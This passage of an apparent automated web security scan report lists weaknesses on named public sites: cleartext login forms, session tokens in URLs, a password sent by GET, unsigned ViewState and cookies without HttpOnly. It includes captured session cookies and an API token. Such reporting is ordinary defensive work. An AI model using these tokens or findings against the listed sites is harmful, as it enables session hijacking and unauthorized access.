The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.javalobby.org/forums/login.jspa
Request
GET /articles/acegisecurity/part1.jsp HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=acegisecurity/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK...[SNIP]... <form action="/forums/login.jspa" method="post" name="loginform"> <input type="password" name="password" size="20" maxlength="150" value="" tabindex="2" id="password01" /> ...[SNIP]...
3.3. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
Request
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=acegisecurity/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... _login08.php"><form id="form_login"> ...[SNIP]... <input name="upass" type="password" id="jq_password" class="inputtext" /> ...[SNIP]...
4. Session token in URL
previous
next
There are 4 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
4.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/CategoryDisplay
Issue detail
The response contains the following links that appear to contain session tokens:http://store.sony.com/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1
Request
GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss HTTP/1.1/SonySearch/Search?mode=&action=search&pst=xss+playstation&pti=0&psti=0&first=1&sti=0&st=Laptop&ti=0/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">-Compatible" content="IE=8" />...[SNIP]... <a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1"> Business Store</a>...[SNIP]... ryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink"> Business Store</a>...[SNIP]...
4.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SearchCatalog
Issue detail
The response contains the following links that appear to contain session tokens:http://store.sony.com/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1
Request
GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA
Response
HTTP/1.1 200 OK/html4/strict.dtd">-Compatible" content="IE=8" />...[SNIP]... <a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1"> Business Store</a>...[SNIP]... ryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink"> Business Store</a>...[SNIP]...
4.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/StoreCatalogDisplay
Issue detail
The response contains the following links that appear to contain session tokens:http://store.sony.com/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1
Request
GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">-Compatible" content="IE=8" />...[SNIP]... <a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1"> Business Store</a>...[SNIP]... ryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink"> Business Store</a>...[SNIP]...
4.4. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The response contains the following links that appear to contain session tokens:http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse
Request
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=acegisecurity/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse"> </script>...[SNIP]...
5. Password field submitted using GET method
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The page contains a form with the following action URL, which is submitted using the GET method:http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
Issue background
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST" . It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
Request
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=acegisecurity/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... _login08.php"><form id="form_login"> ...[SNIP]... <input name="upass" type="password" id="jq_password" class="inputtext" /> ...[SNIP]...
6. ASP.NET ViewState without MAC enabled
previous
next
There are 3 instances of this issue:
Issue description
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
6.1. http://webconnect.sendouts.com/forgot-login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://webconnect.sendouts.com
Path:
/forgot-login.aspx
Request
GET /forgot-login.aspx?ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... /wEPDwUKMjA1MjAyMDk2NGRk " />...[SNIP]...
6.2. http://webconnect.sendouts.com/job-search.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://webconnect.sendouts.com
Path:
/job-search.aspx
Request
GET /job-search.aspx?ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1.sendouts.com/CN_main.aspx?key=cn&id=cfs/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... /wEPDwULLTE2MzA1MDY2NTUPZBYCZg9kFhACBw8QDxYCHgtfIURhdGFCb3VuZGdkEBULFDw8IEFsbCBDYXRlZ29yaWVzID4+EEJ1c2luZXNzIEFuYWx5c3QURGV2ZWxvcGVyL1Byb2dyYW1tZXIHRmluYW5jZR1GaW5hbmNpYWwgU2VydmljZXMgT3BlcmF0aW9ucw9NYXJrZXRpbmcvU2FsZXMTT3BlcmF0aW9uYWwgR2VuZXJhbCRQb3J0Zm9saWlvIE1ndC4gLyBJbnZlc3RtZW50IEFuYWx5c3QRUXVhbGl0eSBBc3N1cmFuY2UQUmVzZWFyY2ggQW5hbHlzdAlUZWNobmljYWwVCwACOTcDMTEyAzEwNwMxMDADMTA5ATQDMTEzAjk5AzExNAMxMDQUKwMLZ2dnZ2dnZ2dnZ2dkZAINDw8WAh4HVmlzaWJsZWhkZAIPDxAPFgIfAWhkZBYAZAIVDxAPFgIfAGdkEBUBA1VTQRUBBzEwMDAwMDAUKwMBZxYBZmQCGQ8QDxYCHwBnZBAVCxo8PCBBbGwgU3RhdGVzIC8gUmVnaW9ucyA+PgpDYWxpZm9ybmlhC0Nvbm5lY3RpY3V0FERpc3RyaWN0IE9mIENvbHVtYmlhB0Zsb3JpZGENTWFzc2FjaHVzZXR0cwpOZXcgSmVyc2V5CE5ldyBZb3JrBE9oaW8MUGVubnN5bHZhbmlhDVdlc3QgVmlyZ2luaWEVCwAHMTAwNTAwMAcxMDEzMDAwBzEwNDIwMDAHMTAxNTAwMAcxMDI2MDAwBzEwMzQwMDAHMTAzNjAwMAcxMDM4MDAwBzEwNDEwMDAHMTAxMDAwMBQrAwtnZ2dnZ2dnZ2dnZxYBZmQCHQ8QZBAVABUAFCsDABYAZAIhDxBkEBUAFQAUKwMAZGQCIw8PZBYCHgdvbkNsaWNrBZcCdmFyIFRoZUZvcm0gPSBkb2N1bWVudC5mb3Jtc1swXTtpZihudWxsIT1UaGVGb3JtKXt2YXIgTWUgPSAoZXZlbnQuc3JjRWxlbWVudCA/IGV2ZW50LnNyY0VsZW1lbnQgOiBldmVudC50YXJnZXQpO01lLmRpc2FibGVkID0gdHJ1ZTt2YXIgZSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2lucHV0Jyk7ZS50eXBlID0gJ2hpZGRlbic7ZS5uYW1lID0gTWUubmFtZTtlLnZhbHVlID0gTWUudmFsdWU7VGhlRm9ybS5hcHBlbmRDaGlsZChlKTtUaGVGb3JtLnN1Ym1pdCgpO31yZXR1cm4gZmFsc2U7ZGQ= " />...[SNIP]...
6.3. http://webconnect.sendouts.com/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://webconnect.sendouts.com
Path:
/login.aspx
Request
GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1.sendouts.com/CN_main.aspx?key=cn&id=cfs/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... /wEPDwULLTE0NjI4ODEyODMPZBYCZg9kFgICAQ9kFgICAQ9kFgJmD2QWAmYPZBYCZg9kFgICAQ9kFgQCCQ8PZBYCHgdvbkNsaWNrBZcCdmFyIFRoZUZvcm0gPSBkb2N1bWVudC5mb3Jtc1swXTtpZihudWxsIT1UaGVGb3JtKXt2YXIgTWUgPSAoZXZlbnQuc3JjRWxlbWVudCA/IGV2ZW50LnNyY0VsZW1lbnQgOiBldmVudC50YXJnZXQpO01lLmRpc2FibGVkID0gdHJ1ZTt2YXIgZSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2lucHV0Jyk7ZS50eXBlID0gJ2hpZGRlbic7ZS5uYW1lID0gTWUubmFtZTtlLnZhbHVlID0gTWUudmFsdWU7VGhlRm9ybS5hcHBlbmRDaGlsZChlKTtUaGVGb3JtLnN1Ym1pdCgpO31yZXR1cm4gZmFsc2U7ZAILDw8WAh4LTmF2aWdhdGVVcmwFQWZvcmdvdC1sb2dpbi5hc3B4P0lEPWNmcyZTaXRlSUQ9V2ViQ29ubmVjdCZHcm91cD1jZnMmS2V5PUNOJkNuSWQ9FgYeC29ubW91c2VvdmVyBTJzdGF0dXM9J0ZvcmdldCB1c2VybmFtZSBvciBwYXNzd29yZCc7IHJldHVybiB0cnVlOx4Kb25tb3VzZW91dAUKc3RhdHVzPScnOx4Hb25jbGljawUKc3RhdHVzPScnO2Rk " />...[SNIP]...
7. Cookie without HttpOnly flag set
previous
next
There are 16 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
7.1. http://www.kb.sony.com/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; Path=/
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":3.5,"c":"http://esupport.sony.com/US/perl/select-system.pl","pv":3,"lc":{"d0":{"v":3,"s":true}},"f":1315353199262,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229
Response
HTTP/1.1 302 Moved TemporarilySet-Cookie: JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; Path=/
7.2. http://www.kb.sony.com/selfservice/closeviewdocument.do
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/closeviewdocument.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=621E1E69E4996835A7FBF59CEC15156D; Path=/selfservice
Request
GET /selfservice/closeviewdocument.do?externalId=BNP1USESpdf HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7-urlencoded; charset=UTF-8/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848F34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 200 OKSet-Cookie: JSESSIONID=621E1E69E4996835A7FBF59CEC15156D; Path=/selfservice
7.3. http://www.kb.sony.com/selfservice/common/extIFrame.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/common/extIFrame.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=044E57DAE7FB0BABCDB708FE81384074; Path=/selfservice
Request
GET /selfservice/common/extIFrame.jsp?docURL=https%3A%2F%2Fwww.docs.sony.com%2FRelease%2FBNP1_US_ES.pdf%23Page%3D1 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848F34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 200 OKSet-Cookie: JSESSIONID=044E57DAE7FB0BABCDB708FE81384074; Path=/selfservice ...[SNIP]...
7.4. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_appFooter.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=9040A36B723BD38D401B803C540F0FCC; Path=/selfservice
Request
GET /selfservice/common/viewdocument_appFooter.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848F34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.9,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":6,"lc":{"d0":{"v":6,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353369099
Response
HTTP/1.1 200 OKSet-Cookie: JSESSIONID=9040A36B723BD38D401B803C540F0FCC; Path=/selfservice /kanisa.css" type="text/css" rel="stylesheet">...[SNIP]...
7.5. http://www.kb.sony.com/selfservice/common/viewdocument_appHeader.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_appHeader.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=A073C5F219F136212A7F823E00AE1666; Path=/selfservice
Request
GET /selfservice/common/viewdocument_appHeader.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848F34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.9,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":6,"lc":{"d0":{"v":6,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353369099
Response
HTTP/1.1 200 OKSet-Cookie: JSESSIONID=A073C5F219F136212A7F823E00AE1666; Path=/selfservice /html4/strict.dtd">...[SNIP]...
7.6. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Metadata.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Metadata.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=E863918E75FCBD614E29DB14317D33BC; Path=/selfservice
Request
